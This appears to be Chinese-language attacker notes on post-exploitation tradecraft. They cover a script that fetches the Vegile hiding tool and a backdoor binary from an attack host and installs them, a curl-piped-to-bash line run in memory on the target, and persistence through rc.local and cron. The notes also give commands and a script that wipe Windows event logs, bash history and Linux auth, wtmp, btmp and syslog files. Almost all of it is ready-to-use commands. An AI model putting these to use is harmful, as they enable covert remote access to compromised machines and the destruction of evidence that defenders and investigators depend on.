需要目标机执行

#####在攻击机创建
┌──(root💀kali-linux-2021-3)-[~]
└─# cd /var/www/html          
                                                                                                                                                                               
┌──(root💀kali-linux-2021-3)-[/var/www/html]
└─# vim laohe.sh 

#!/bin/bash
cd /tmp
wget http://10.211.55.6/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && chmod +x Vegile && wget http://10.211.55.6/laohe_ghost && chmod +x laohe_ghost && echo y | ./Vegile --i laohe_ghost >> /dev/null 2>&1
相当于使用任意键 echo y |
laohe.sh这个脚本文件不需要添加权限

rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master

####靶机执行（8080那台机器拿到权限后，执行）
bash <(curl -s -L http://10.211.55.6/laohe.sh) >> /dev/null 2>&1
-s 静默，不输出任何东西
-L 跟http链接，下载到内存，不保存到磁盘


###开机自启动
给开机启动项加些内容
/etc/rc.d/rc.local
echo "bash <(curl -s -L http://10.211.55.6/laohe.sh) >> /dev/null 2>&1" >> /etc/rc.d/rc.local
chmod +x /etc/rc.d/rc.local

方法二：
计划任务
echo "0 */1 * * * root bash <(curl -s -L http://10.211.55.6/laohe.sh) >> /dev/null 2>&1" >> /etc/rc.d/rc.local
每一小时建立一次连接


###系统日志清理，仅本地清理
如果保存至服务器，日志则不能被清理

#Windows日志清理
win+R eventvwr
打开事件查看器-Windows日志-安全
或者
meterpreter > shell
C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f

#linux系统清理
history -c
清除历史命令

使系统不再保存历史命令
vim /etc/profile 找到HISTSIZE这个值，修改为0

删除访问日志
失败日志：echo > /var/log/btmp
成功日志：echo > /var/log/wtmp
安全日志：echo > /var/log/secure

删除日志脚本
vim clog.sh
#!/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/run/utmp
echo > /var/log/lastlog
history

chmod +x clog.sh
bash clog.sh 2>&1






























